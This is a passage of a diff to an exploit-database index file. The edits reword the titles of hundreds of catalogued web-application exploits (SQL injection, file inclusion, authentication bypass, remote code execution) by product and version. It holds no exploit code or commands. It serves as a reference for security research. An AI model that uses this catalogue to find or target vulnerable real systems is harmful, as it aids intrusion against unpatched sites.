- 'targetid' Blind SQL Injection",2009-08-07,"599eme Man",php,webapps,0 9389,platforms/php/webapps/9389.txt,"Logoshows BBS 2.0 - 'forumid' SQL Injection",2009-08-07,Ruzgarin_Oglu,php,webapps,0 9390,platforms/php/webapps/9390.txt,"Typing Pal 1.0 - 'idTableProduit' SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0 -9394,platforms/php/webapps/9394.pl,"Arab Portal 2.2 - (Authentication Bypass) Blind SQL Injection",2009-08-07,"Jafer Al Zidjali",php,webapps,0 +9394,platforms/php/webapps/9394.pl,"Arab Portal 2.2 - Blind Cookie Authentication Bypass",2009-08-07,"Jafer Al Zidjali",php,webapps,0 9395,platforms/php/webapps/9395.txt,"PHPCityPortal - Authentication Bypass",2009-08-07,CoBRa_21,php,webapps,0 9396,platforms/php/webapps/9396.txt,"Facil Helpdesk - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0 9397,platforms/php/webapps/9397.txt,"IsolSoft Support Center 2.5 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0 @@ -22375,7 +22378,7 @@ id,file,description,date,author,platform,type,port 9716,platforms/multiple/webapps/9716.txt,"Network Management/Inventory System - 'header.php' Remote File Inclusion",2009-09-18,"EA Ngel",multiple,webapps,0 9719,platforms/multiple/webapps/9719.txt,"FanUpdate 2.2.1 - 'show-cat.php' SQL Injection",2009-09-18,"(In)Security Romania",multiple,webapps,0 9720,platforms/multiple/webapps/9720.txt,"FSphp 0.2.1 - Multiple Remote File Inclusions",2009-09-18,NoGe,multiple,webapps,0 -9721,platforms/multiple/webapps/9721.txt,"Joomla! Component com_surveymanager 1.5.0 - SQL Injection (stype)",2009-09-21,kaMtiEz,multiple,webapps,0 +9721,platforms/multiple/webapps/9721.txt,"Joomla! Component com_surveymanager 1.5.0 - 'stype' SQL Injection",2009-09-21,kaMtiEz,multiple,webapps,0 9722,platforms/multiple/webapps/9722.txt,"DDL CMS 1.0 - Multiple Remote File Inclusions",2009-09-21,HxH,multiple,webapps,0 9723,platforms/multiple/webapps/9723.txt,"Joomla! Component com_jbudgetsmagic 0.3.2 < 0.4.0 - 'bid' SQL Injection",2009-09-21,kaMtiEz,multiple,webapps,0 9724,platforms/multiple/webapps/9724.txt,"BAnner ROtation System mini - Multiple Remote File Inclusions",2009-09-21,"EA Ngel",multiple,webapps,0 @@ -22613,7 +22616,7 @@ id,file,description,date,author,platform,type,port 10403,platforms/php/webapps/10403.txt,"Uploadscript 1.0 - Multiple Vulnerabilities",2009-12-13,Mr.aFiR,php,webapps,0 10404,platforms/php/webapps/10404.txt,"Interspire Shopping Cart - Full Path Disclosure",2009-12-13,Mr.aFiR,php,webapps,0 10406,platforms/php/webapps/10406.txt,"AccStatistics 1.1 - Cross-Site Request Forgery (Change Admin Settings)",2009-12-13,"Milos Zivanovic",php,webapps,0 -10407,platforms/php/webapps/10407.txt,"Joomla! Component com_virtuemart 1.0 - SQL Injection (Product_ID)",2009-12-13,"SOA Crew",php,webapps,0 +10407,platforms/php/webapps/10407.txt,"Joomla! Component com_virtuemart 1.0 - 'Product_ID' SQL Injection",2009-12-13,"SOA Crew",php,webapps,0 10408,platforms/php/webapps/10408.txt,"SpireCMS 2.0 - SQL Injection",2009-12-13,"Dr.0rYX & Cr3W-DZ",php,webapps,0 10410,platforms/php/webapps/10410.txt,"phpLDAPadmin - Local File Inclusion",2009-12-10,ipsecs,php,webapps,0 10412,platforms/php/webapps/10412.txt,"Acc PHP eMail 1.1 - Cross-Site Request Forgery",2009-12-13,bi0,php,webapps,0 @@ -22696,9 +22699,9 @@ id,file,description,date,author,platform,type,port 10516,platforms/php/webapps/10516.txt,"Jobscript4Web 3.5 - Cross-Site Request Forgery Multiple Vulnerabilities",2009-12-17,bi0,php,webapps,0 10517,platforms/php/webapps/10517.txt,"Matrimony Script - Cross-Site Request Forgery",2009-12-17,bi0,php,webapps,0 10520,platforms/asp/webapps/10520.txt,"Active Auction House 3.6 - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 -10522,platforms/php/webapps/10522.txt,"Pre Job Board 1.0 - SQL Authentication Bypass",2009-12-17,bi0,php,webapps,0 +10522,platforms/php/webapps/10522.txt,"Pre Job Board 1.0 - Authentication Bypass",2009-12-17,bi0,php,webapps,0 10523,platforms/php/webapps/10523.txt,"Uploader by CeleronDude 5.3.0 - Arbitrary File Upload (1)",2009-12-17,Stink,php,webapps,0 -10525,platforms/asp/webapps/10525.txt,"Pre Jobo .NET - SQL Authentication Bypass",2009-12-17,bi0,asp,webapps,0 +10525,platforms/asp/webapps/10525.txt,"Pre Jobo .NET - Authentication Bypass",2009-12-17,bi0,asp,webapps,0 10526,platforms/asp/webapps/10526.txt,"ActiveBuyandSell 6.2 - 'buyersend.asp?catid' Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10527,platforms/php/webapps/10527.txt,"ReVou Software - SQL Injection",2009-12-17,R3d-D3V!L,php,webapps,0 10528,platforms/php/webapps/10528.txt,"V.H.S. Booking - 'hotel_habitaciones.php?HotelID' SQL Injection",2009-12-17,R3d-D3V!L,php,webapps,0 @@ -22774,7 +22777,7 @@ id,file,description,date,author,platform,type,port 10645,platforms/php/webapps/10645.txt,"PBX Phone System 2.x - Multiple Vulnerabilities",2009-12-24,Global-Evolution,php,webapps,0 10647,platforms/php/webapps/10647.txt,"VideoIsland - Arbitrary File Upload",2009-12-24,RENO,php,webapps,0 10648,platforms/php/webapps/10648.txt,"cms -db 0.7.13 - Multiple Vulnerabilities",2009-12-25,cp77fk4r,php,webapps,0 -10649,platforms/windows/webapps/10649.html,"SoftCab Sound Converter - ActiveX Insecure Method Exploit (sndConverter.ocx)",2009-12-25,"ThE g0bL!N",windows,webapps,0 +10649,platforms/windows/webapps/10649.html,"SoftCab Sound Converter - 'sndConverter.ocx' ActiveX Insecure Method Exploit",2009-12-25,"ThE g0bL!N",windows,webapps,0 10652,platforms/php/webapps/10652.txt,"asaher pro 1.0 - Remote File Inclusion",2009-12-25,indoushka,php,webapps,0 10653,platforms/php/webapps/10653.txt,"Winn Guestbook 2.4 / Winn.ws - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10654,platforms/php/webapps/10654.txt,"APHP ImgList 1.2.2 - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 @@ -23249,7 +23252,7 @@ id,file,description,date,author,platform,type,port 11502,platforms/php/webapps/11502.txt,"phpAutoVideo - Cross-Site Request Forgery",2010-02-19,GoLdeN-z3r0,php,webapps,0 11503,platforms/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - Cross-Site Request Forgery (Add Admin) / Cross-Site Scripting",2010-02-19,d1dn0t,php,webapps,0 11504,platforms/php/webapps/11504.txt,"Amelia CMS - SQL Injection",2010-02-19,Ariko-Security,php,webapps,0 -11507,platforms/php/webapps/11507.txt,"WSC CMS - (Authentication Bypass) SQL Injection",2010-02-19,Phenom,php,webapps,0 +11507,platforms/php/webapps/11507.txt,"WSC CMS - Authentication Bypass",2010-02-19,Phenom,php,webapps,0 11508,platforms/php/webapps/11508.txt,"Fonality trixbox 2.2.4 - 'PhonecDirectory.php' SQL Injection",2010-02-19,NorSlacker,php,webapps,0 11509,platforms/php/webapps/11509.txt,"PHPKit 1.6.1 - 'mailer.php' SQL Injection",2010-02-19,"Easy Laster",php,webapps,0 11511,platforms/php/webapps/11511.txt,"Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion",2010-02-19,kaMtiEz,php,webapps,0 @@ -23482,7 +23485,7 @@ id,file,description,date,author,platform,type,port 11881,platforms/php/webapps/11881.php,"SiteX CMS 0.7.4 Beta - 'photo.php' SQL Injection",2010-03-25,Sc0rpi0n,php,webapps,0 11882,platforms/php/webapps/11882.txt,"Direct News 4.10.2 - Multiple Remote File Inclusions",2010-03-25,mat,php,webapps,0 11883,platforms/php/webapps/11883.txt,"WebsiteBaker 2.8.1 - DataBase Backup Disclosure",2010-03-25,Tr0y-x,php,webapps,0 -11884,platforms/php/webapps/11884.txt,"Joomla! Component dcsFlashGames 2.0RC1 - SQL Injection (catid)",2010-03-26,kaMtiEz,php,webapps,0 +11884,platforms/php/webapps/11884.txt,"Joomla! Component dcsFlashGames 2.0RC1 - 'catid' SQL Injection",2010-03-26,kaMtiEz,php,webapps,0 11885,platforms/php/webapps/11885.txt,"Flirt Matching Sms System - SQL Injection",2010-03-26,"Easy Laster",php,webapps,0 11888,platforms/php/webapps/11888.txt,"DaFun Spirit 2.2.5 - Multiple Remote File Inclusions",2010-03-26,2010-03-26,php,webapps,0 11889,platforms/php/webapps/11889.txt,"leaftec CMS - Multiple Vulnerabilities",2010-03-26,Valentin,php,webapps,0 @@ -23990,7 +23993,7 @@ id,file,description,date,author,platform,type,port 28047,platforms/php/webapps/28047.txt,"CMS Faethon 1.3.2 - Multiple Remote File Inclusions",2006-06-17,"M.Hasran Addahroni",php,webapps,0 28048,platforms/php/webapps/28048.txt,"RahnemaCo - 'page.php' PageID Remote File Inclusion",2006-06-17,CrAzY.CrAcKeR,php,webapps,0 28128,platforms/php/webapps/28128.txt,"CMS Mini 0.2.2 - Multiple Vulnerabilities",2013-09-06,SANTHO,php,webapps,80 -12679,platforms/windows/webapps/12679.txt,"3Com* iMC (Intelligent Management Center) - Unauthenticated File Retrieval (Traversal)",2010-05-21,"Richard Brain",windows,webapps,0 +12679,platforms/windows/webapps/12679.txt,"3Com* iMC (Intelligent Management Center) - Unauthenticated Traversal File Retrieval",2010-05-21,"Richard Brain",windows,webapps,0 12680,platforms/windows/webapps/12680.txt,"3Com* iMC (Intelligent Management Center) - Cross-Site Scripting / Information Disclosure Flaws",2010-05-21,"Richard Brain",windows,webapps,0 12684,platforms/php/webapps/12684.txt,"ConPresso 4.0.7 - SQL Injection",2010-05-21,Gamoscu,php,webapps,0 12686,platforms/php/webapps/12686.txt,"Online University - Authentication Bypass",2010-05-21,cr4wl3r,php,webapps,0 @@ -24199,7 +24202,7 @@ id,file,description,date,author,platform,type,port 13854,platforms/php/webapps/13854.txt,"UTStats - Cross-Site Scripting / SQL Injection / Full Path Disclosure",2010-06-13,"LuM Member",php,webapps,0 13855,platforms/php/webapps/13855.txt,"Eyeland Studio Inc. - SQL Injection",2010-06-13,Mr.P3rfekT,php,webapps,0 13856,platforms/php/webapps/13856.txt,"Yamamah Photo Gallery 1.00 - 'download.php' Local File Disclosure",2010-06-13,mat,php,webapps,0 -13857,platforms/php/webapps/13857.txt,"Yamamah Photo Gallery 1.00 - SQL Injection (calbums)",2010-06-13,CoBRa_21,php,webapps,0 +13857,platforms/php/webapps/13857.txt,"Yamamah Photo Gallery 1.00 - 'calbums' SQL Injection",2010-06-13,CoBRa_21,php,webapps,0 13858,platforms/php/webapps/13858.txt,"Eyeland Studio Inc. - 'game.php' SQL Injection",2010-06-13,CoBRa_21,php,webapps,0 13859,platforms/asp/webapps/13859.txt,"Digital Interchange Document Library - SQL Injection",2010-06-13,"L0rd CrusAd3r",asp,webapps,0 13860,platforms/asp/webapps/13860.txt,"Digital Interchange Calendar - SQL Injection",2010-06-13,"L0rd CrusAd3r",asp,webapps,0 @@ -24244,7 +24247,7 @@ id,file,description,date,author,platform,type,port 13931,platforms/php/webapps/13931.txt,"KubeLance 1.7.6 - 'profile.php' SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 13933,platforms/php/webapps/13933.txt,"UK One Media CMS - 'id' Error-Based SQL Injection",2010-06-19,LiquidWorm,php,webapps,0 13935,platforms/php/webapps/13935.txt,"Joomla! Component RSComments 1.0.0 - Persistent Cross-Site Scripting",2010-06-19,jdc,php,webapps,0 -13936,platforms/php/webapps/13936.txt,"Elite Gaming Ladders 3.5 - SQL Injection (ladder[id])",2010-06-19,ahwak2000,php,webapps,0 +13936,platforms/php/webapps/13936.txt,"Elite Gaming Ladders 3.5 - 'ladder[id]' SQL Injection",2010-06-19,ahwak2000,php,webapps,0 13937,platforms/php/webapps/13937.txt,"SnowCade 3.0 - SQL Injection",2010-06-19,ahwak2000,php,webapps,0 13938,platforms/php/webapps/13938.html,"WebsiteBaker 2.8.1 - Cross-Site Request Forgery (PoC)",2010-06-19,"Luis Santana",php,webapps,0 14848,platforms/php/webapps/14848.txt,"Web-Ideas Web Shop Standard - SQL Injection",2010-08-31,Ariko-Security,php,webapps,0 @@ -24439,7 +24442,7 @@ id,file,description,date,author,platform,type,port 14259,platforms/php/webapps/14259.txt,"Green Shop - SQL Injection",2010-07-07,PrinceofHacking,php,webapps,0 14260,platforms/php/webapps/14260.txt,"Sijio Community Software - SQL Injection / Persistent Cross-Site Scripting",2010-07-07,Sid3^effects,php,webapps,0 14262,platforms/php/webapps/14262.txt,"Simple Document Management System - SQL Injection",2010-07-07,Sid3^effects,php,webapps,0 -14264,platforms/hardware/webapps/14264.html,"Harris Stratex StarMAX 2100 WIMAX Subscriber Station - Running Config Cross-Site Request Forgery",2010-07-07,kalyanakumar,hardware,webapps,0 +14264,platforms/hardware/webapps/14264.html,"Harris Stratex StarMAX 2100 WIMAX Subscriber Station - Running Configuration Cross-Site Request Forgery",2010-07-07,kalyanakumar,hardware,webapps,0 14263,platforms/php/webapps/14263.txt,"Joomla! Component ArtForms 2.1b7.2 rc2 - Multiple Vulnerabilities",2010-07-07,"Salvatore Fresta",php,webapps,0 14265,platforms/php/webapps/14265.txt,"Joomla! Component PaymentsPlus 2.1.5 - Blind SQL Injection",2010-07-07,Sid3^effects,php,webapps,0 14270,platforms/php/webapps/14270.txt,"Zylone IT - Multiple Blind SQL Injections",2010-07-08,Callo,php,webapps,0 @@ -24561,7 +24564,7 @@ id,file,description,date,author,platform,type,port 14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion",2010-07-27,"John Leitch",php,webapps,0 14488,platforms/php/webapps/14488.txt,"Joomla! Component com_appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0 14490,platforms/php/webapps/14490.txt,"nuBuilder - Remote File Inclusion",2010-07-28,Ahlspiess,php,webapps,0 -14494,platforms/php/webapps/14494.txt,"AV Arcade 3 - Cookie SQL Injection / Authentication Bypass",2010-07-28,saudi0hacker,php,webapps,0 +14494,platforms/php/webapps/14494.txt,"AV Arcade 3 - Cookie Authentication Bypass",2010-07-28,saudi0hacker,php,webapps,0 14495,platforms/php/webapps/14495.txt,"Joomla! Component com_photomapgallery 1.6.0 - Multiple Blind SQL Injections",2010-07-28,"Salvatore Fresta",php,webapps,0 14499,platforms/php/webapps/14499.txt,"Joomla! Component com_pbbooking 1.0.4_3 - Multiple Blind SQL Injections",2010-07-29,"Salvatore Fresta",php,webapps,0 14500,platforms/php/webapps/14500.txt,"Whizzy CMS 10.02 - Local File Inclusion",2010-07-29,"Anarchy Angel",php,webapps,0 @@ -25032,7 +25035,7 @@ id,file,description,date,author,platform,type,port 15691,platforms/php/webapps/15691.txt,"Pulse CMS Basic - Local File Inclusion",2010-12-05,"Mark Stanislav",php,webapps,0 15699,platforms/php/webapps/15699.txt,"phpMyAdmin - Client-Side Code Injection / Redirect Link Falsification",2010-12-06,"emgent white_sheep & scox",php,webapps,80 33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 - Cross-Site Scripting Multiple Vulnerabilities",2010-02-24,indoushka,php,webapps,0 -15701,platforms/php/webapps/15701.txt,"MODx REvolution CMS 2.0.4-pl2 - Cross-Site Scripting (POST Injection)",2010-12-06,LiquidWorm,php,webapps,0 +15701,platforms/php/webapps/15701.txt,"MODx REvolution CMS 2.0.4-pl2 - POST injection Cross-Site Scripting",2010-12-06,LiquidWorm,php,webapps,0 15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b - Arbitrary File Upload",2010-12-07,"Sun Army",asp,webapps,0 15744,platforms/cgi/webapps/15744.txt,"Gitweb 1.7.3.3 - Cross-Site Scripting",2010-12-15,emgent,cgi,webapps,80 15710,platforms/multiple/webapps/15710.txt,"Apache Archiva 1.0 < 1.3.1 - Cross-Site Request Forgery",2010-12-09,"Anatolia Security",multiple,webapps,0 @@ -25577,7 +25580,7 @@ id,file,description,date,author,platform,type,port 17496,platforms/php/webapps/17496.txt,"Joomla! 1.6.3 - Cross-Site Request Forgery",2011-07-06,"Luis Santana",php,webapps,0 17500,platforms/php/webapps/17500.txt,"LuxCal Web Calendar 2.4.2/2.5.0 - SQL Injection",2011-07-07,kaMtiEz,php,webapps,0 17503,platforms/jsp/webapps/17503.pl,"ManageEngine ServiceDesk 8.0.0.12 - Database Disclosure",2011-07-07,@ygoltsev,jsp,webapps,0 -17508,platforms/php/webapps/17508.txt,"appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - Cross-Site Scripting Vulnerabilities",2011-07-08,"SecPod Research",php,webapps,0 +17508,platforms/php/webapps/17508.txt,"appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - Cross-Site Scripting",2011-07-08,"SecPod Research",php,webapps,0 17510,platforms/php/webapps/17510.py,"phpMyAdmin3 (pma3) - Remote Code Execution",2011-07-08,wofeiwo,php,webapps,0 17514,platforms/php/webapps/17514.php,"phpMyAdmin 3.x - Swekey Remote Code Injection",2011-07-09,Mango,php,webapps,0 17515,platforms/php/webapps/17515.txt,"Portix-CMS 1.5.0. rc5 - Local File Inclusion",2011-07-09,Or4nG.M4N,php,webapps,0 @@ -25598,7 +25601,7 @@ id,file,description,date,author,platform,type,port 17555,platforms/php/webapps/17555.txt,"vBulletin 4.0.x 4.1.3 - 'messagegroupid' SQL Injection",2011-07-21,fb1h2s,php,webapps,0 17556,platforms/php/webapps/17556.txt,"Joomla! Component JE Story Submit - Local File Inclusion",2011-07-21,v3n0m,php,webapps,0 17560,platforms/php/webapps/17560.txt,"Joomla! Component mod_spo - SQL Injection",2011-07-21,SeguridadBlanca,php,webapps,0 -17562,platforms/php/webapps/17562.php,"ExtCalendar2 - (Authentication Bypass / Cookie) SQL Injection",2011-07-23,Lagripe-Dz,php,webapps,0 +17562,platforms/php/webapps/17562.php,"ExtCalendar2 - Cookie Authentication Bypass / Backdoor Upload",2011-07-23,Lagripe-Dz,php,webapps,0 17574,platforms/jsp/webapps/17574.php,"CA ARCserve D2D r15 GWT RPC - Multiple Vulnerabilities",2011-07-26,rgod,jsp,webapps,0 17570,platforms/php/webapps/17570.txt,"MusicBox 3.7 - Multiple Vulnerabilities",2011-07-25,R@1D3N,php,webapps,0 17571,platforms/php/webapps/17571.txt,"OpenX Ad Server 2.8.7 - Cross-Site Request Forgery",2011-07-26,"Narendra Shinde",php,webapps,0 @@ -25912,7 +25915,7 @@ id,file,description,date,author,platform,type,port 18236,platforms/php/webapps/18236.txt,"Pixie 1.04 - Blog Post Cross-Site Request Forgery",2011-12-11,hackme,php,webapps,0 18239,platforms/php/webapps/18239.rb,"Traq 2.3 - Authentication Bypass / Remote Code Execution (Metasploit)",2011-12-13,Metasploit,php,webapps,0 18243,platforms/php/webapps/18243.rb,"PmWiki 2.2.34 - 'pagelist' Remote PHP Code Injection (2) (Metasploit)",2011-12-14,Metasploit,php,webapps,0 -18246,platforms/php/webapps/18246.txt,"Seotoaster - SQL Injection Admin Login Bypass",2011-12-16,"Stefan Schurtz",php,webapps,0 +18246,platforms/php/webapps/18246.txt,"Seotoaster - SQL Injection",2011-12-16,"Stefan Schurtz",php,webapps,0 18247,platforms/multiple/webapps/18247.txt,"Capexweb 1.1 - SQL Injection",2011-12-16,"D1rt3 Dud3",multiple,webapps,0 18248,platforms/php/webapps/18248.pl,"mPDF 5.3 - File Disclosure",2011-12-16,ZadYree,php,webapps,0 18249,platforms/php/webapps/18249.txt,"appRain CMF 0.1.5 - Multiple Web Vulnerabilities",2011-12-19,Vulnerability-Lab,php,webapps,0 @@ -27820,7 +27823,7 @@ id,file,description,date,author,platform,type,port 24588,platforms/asp/webapps/24588.txt,"GetSolutions GetIntranet 2.2 - Multiple Remote Input Validation Vulnerabilities",2004-09-10,Criolabs,asp,webapps,0 24589,platforms/asp/webapps/24589.txt,"GetSolutions GetInternet - Multiple SQL Injections",2004-09-10,Criolabs,asp,webapps,0 24591,platforms/cgi/webapps/24591.txt,"PerlDesk Language Variable - Server-Side Script Execution",2004-09-13,"Nikyt0x Argentina",cgi,webapps,0 -24601,platforms/php/webapps/24601.txt,"BBS E-Market Professional bf_130 (1.3.0) - Multiple File Disclosure Vulnerabilities",2004-09-15,"Jeong Jin-Seok",php,webapps,0 +24601,platforms/php/webapps/24601.txt,"BBS E-Market Professional bf_130 1.3.0 - Multiple File Disclosure Vulnerabilities",2004-09-15,"Jeong Jin-Seok",php,webapps,0 24721,platforms/cgi/webapps/24721.txt,"TIPS MailPost 5.1.1 - 'APPEND' Cross-Site Scripting",2004-11-03,Procheckup,cgi,webapps,0 24603,platforms/ios/webapps/24603.txt,"Remote File Manager 1.2 iOS - Multiple Vulnerabilities",2013-03-06,Vulnerability-Lab,ios,webapps,0 24604,platforms/asp/webapps/24604.txt,"Snitz Forums 2000 - 'down.asp' HTTP Response Splitting",2004-09-16,"Maestro De-Seguridad",asp,webapps,0 @@ -28287,7 +28290,7 @@ id,file,description,date,author,platform,type,port 25442,platforms/php/webapps/25442.txt,"WHMCS 4.x - 'invoicefunctions.php?id' SQL Injection",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0 25447,platforms/php/webapps/25447.txt,"Alienvault Open Source SIEM (OSSIM) 4.1.2 - Multiple SQL Injections",2013-05-14,RunRunLevel,php,webapps,0 25449,platforms/php/webapps/25449.txt,"UMI CMS 2.9 - Cross-Site Request Forgery",2013-05-14,"High-Tech Bridge SA",php,webapps,0 -25451,platforms/php/webapps/25451.txt,"phpBB 1.x/2.0.x - '(Knowledge Base Module) 'KB.php' SQL Injection",2005-04-13,deluxe@security-project.org,php,webapps,0 +25451,platforms/php/webapps/25451.txt,"phpBB 1.x/2.0.x - Knowledge Base Module 'KB.php' SQL Injection",2005-04-13,deluxe@security-project.org,php,webapps,0 25455,platforms/asp/webapps/25455.txt,"OneWorldStore - 'DisplayResults.asp' SQL Injection",2005-04-19,Lostmon,asp,webapps,0 25456,platforms/asp/webapps/25456.txt,"OneWorldStore - 'DisplayResults.asp' Cross-Site Scripting",2005-04-19,Lostmon,asp,webapps,0 25457,platforms/php/webapps/25457.c,"UBBCentral UBB.Threads 6.0 - 'Printthread.php' SQL Injection",2005-03-11,HLL,php,webapps,0 @@ -28588,7 +28591,7 @@ id,file,description,date,author,platform,type,port 25846,platforms/php/webapps/25846.txt,"cPanel 9.1 - 'User' Cross-Site Scripting",2005-05-20,abducter_minds@yahoo.com,php,webapps,0 25847,platforms/asp/webapps/25847.txt,"LaGarde StoreFront 5.0 Shopping Cart - 'login.asp' SQL Injection",2003-12-07,G00db0y,asp,webapps,0 25848,platforms/php/webapps/25848.pl,"PAFaq beta4 - Database Unauthorized Access",2005-06-20,james,php,webapps,0 -25849,platforms/php/webapps/25849.txt,"PhpTax 0.8 - File Manipulation (newvalue) / Remote Code Execution",2013-05-31,"CWH Underground",php,webapps,0 +25849,platforms/php/webapps/25849.txt,"PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution",2013-05-31,"CWH Underground",php,webapps,0 26289,platforms/cgi/webapps/26289.txt,"Alkalay.Net (Multiple Scripts) - Remote Command Execution",2005-08-21,sullo@cirt.net,cgi,webapps,0 26290,platforms/cgi/webapps/26290.txt,"PerlDiver 2.31 - 'Perldiver.cgi' Cross-Site Scripting",2005-08-21,"Donnie Werner",cgi,webapps,0 26291,platforms/asp/webapps/26291.txt,"Mall23 - 'AddItem.asp' SQL Injection",2005-08-21,SmOk3,asp,webapps,0 @@ -28684,13 +28687,13 @@ id,file,description,date,author,platform,type,port 25956,platforms/asp/webapps/25956.txt,"Comersus Open Technologies Comersus Cart 6.0.41 - Cross-Site Scripting Multiple Vulnerabilities",2005-07-07,"Diabolic Crab",asp,webapps,0 25957,platforms/php/webapps/25957.txt,"PunBB 1.x - 'profile.php' User Profile Edit Module SQL Injection",2005-07-08,"Stefan Esser",php,webapps,0 25958,platforms/php/webapps/25958.txt,"ID Team ID Board 1.1.3 - 'SQL.CLS.php' SQL Injection",2005-07-10,Defa,php,webapps,0 -25959,platforms/php/webapps/25959.txt,"Spid 1.3 - lang_path File Inclusion",2005-07-11,"skdaemon porra",php,webapps,0 +25959,platforms/php/webapps/25959.txt,"Spid 1.3 - 'lang_path' File Inclusion",2005-07-11,"skdaemon porra",php,webapps,0 25960,platforms/php/webapps/25960.txt,"PPA 0.5.6 - 'ppa_root_path' File Inclusion",2005-07-10,"skdaemon porra",php,webapps,0 25963,platforms/asp/webapps/25963.txt,"Dragonfly Commerce 1.0 - Multiple SQL Injections",2005-07-12,"Diabolic Crab",asp,webapps,0 25964,platforms/php/webapps/25964.c,"PHPsFTPd 0.2/0.4 - 'Inc.login.php' Privilege Escalation",2005-07-11,"Stefan Lochbihler",php,webapps,0 25965,platforms/asp/webapps/25965.txt,"DVBBS 7.1 - 'ShowErr.asp' Cross-Site Scripting",2005-07-12,rUnViRuS,asp,webapps,0 25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0 -25969,platforms/hardware/webapps/25969.txt,"NETGEAR WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0 +25969,platforms/hardware/webapps/25969.txt,"NETGEAR WPN824v3 - Unauthorized Configuration Download",2013-06-05,"Jens Regel",hardware,webapps,0 25971,platforms/php/webapps/25971.txt,"Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion",2013-06-05,"CWH Underground",php,webapps,0 25973,platforms/php/webapps/25973.txt,"Ruubikcms 1.1.1 - 'tinybrowser.php?folder' Directory Traversal",2013-06-05,expl0i13r,php,webapps,0 25976,platforms/hardware/webapps/25976.txt,"DS3 Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",hardware,webapps,0 @@ -30547,7 +30550,7 @@ id,file,description,date,author,platform,type,port 28492,platforms/php/webapps/28492.txt,"Uni-vert PHPLeague 0.82 - 'Joueurs.php' SQL Injection",2006-09-06,DrEiNsTeIn,php,webapps,0 28493,platforms/php/webapps/28493.txt,"PHP-Nuke Book Catalog Module 1.0 - 'upload.php' Arbitrary File Upload",2006-09-07,osm,php,webapps,0 28494,platforms/php/webapps/28494.txt,"AckerTodo 4.0 - 'index.php' Cross-Site Scripting",2006-09-07,viz.security,php,webapps,0 -28495,platforms/php/webapps/28495.txt,"TWiki 4.0.x - Viewfile Directory Traversal",2006-09-07,"Peter Thoeny",php,webapps,0 +28495,platforms/php/webapps/28495.txt,"TWiki 4.0.x - 'Viewfile' Directory Traversal",2006-09-07,"Peter Thoeny",php,webapps,0 28496,platforms/php/webapps/28496.php,"PHP-Fusion 6.0.x - 'news.php' SQL Injection",2006-09-07,rgod,php,webapps,0 28497,platforms/php/webapps/28497.txt,"Vikingboard 0.1b - 'help.php' Cross-Site Scripting",2006-09-08,Hessam-x,php,webapps,0 28498,platforms/php/webapps/28498.txt,"Vikingboard 0.1b - 'report.php' Cross-Site Scripting",2006-09-08,Hessam-x,php,webapps,0 @@ -31022,7 +31025,7 @@ id,file,description,date,author,platform,type,port 29088,platforms/asp/webapps/29088.txt,"ActiveNews Manager - 'query' Cross-Site Scripting",2006-11-18,"laurent gaffie",asp,webapps,0 29089,platforms/asp/webapps/29089.txt,"Active News Manager - 'catID' SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 29090,platforms/asp/webapps/29090.txt,"ActiveNews Manager - 'articleId' SQL Injection (2)",2006-11-18,"laurent gaffie",asp,webapps,0 -29091,platforms/php/webapps/29091.txt,"ZonPHP 2.25 - Remote Code Execution (Remote Code Execution)",2013-10-20,"Halim Cruzito",php,webapps,0 +29091,platforms/php/webapps/29091.txt,"ZonPHP 2.25 - Remote Code Execution",2013-10-20,"Halim Cruzito",php,webapps,0 29156,platforms/asp/webapps/29156.txt,"CreaDirectory 1.2 - 'search.asp?search' Cross-Site Scripting",2006-11-21,"laurent gaffie",asp,webapps,0 29211,platforms/php/webapps/29211.txt,"WordPress Theme Curvo - Cross-Site Request Forgery / Arbitrary File Upload",2013-10-26,"Byakuya Kouta",php,webapps,0 29118,platforms/asp/webapps/29118.txt,"Enthrallweb eClassifieds - 'ad.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",asp,webapps,0 @@ -31202,7 +31205,7 @@ id,file,description,date,author,platform,type,port 29352,platforms/php/webapps/29352.txt,"phpCMS 1.1.7 - 'class.layout_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 29375,platforms/php/webapps/29375.txt,"Simplog 0.9.3 - 'archive.php' SQL Injection",2007-01-02,"Javor Ninov",php,webapps,0 29376,platforms/php/webapps/29376.txt,"VCard Pro - 'gbrowse.php' Cross-Site Scripting",2007-01-02,exexp,php,webapps,0 -29354,platforms/php/webapps/29354.txt,"pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting Web Vulnerabilities",2013-11-01,Vulnerability-Lab,php,webapps,0 +29354,platforms/php/webapps/29354.txt,"pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting",2013-11-01,Vulnerability-Lab,php,webapps,0 29474,platforms/php/webapps/29474.txt,"Scriptme SmE 1.21 - File Mailer Login SQL Injection",2007-01-16,CorryL,php,webapps,0 29356,platforms/php/webapps/29356.txt,"WordPress 1.x/2.0.x - 'template.php' HTML Injection",2006-12-27,"David Kierznowski",php,webapps,0 29357,platforms/asp/webapps/29357.txt,"Hosting Controller 7C - 'FolderManager.aspx' Directory 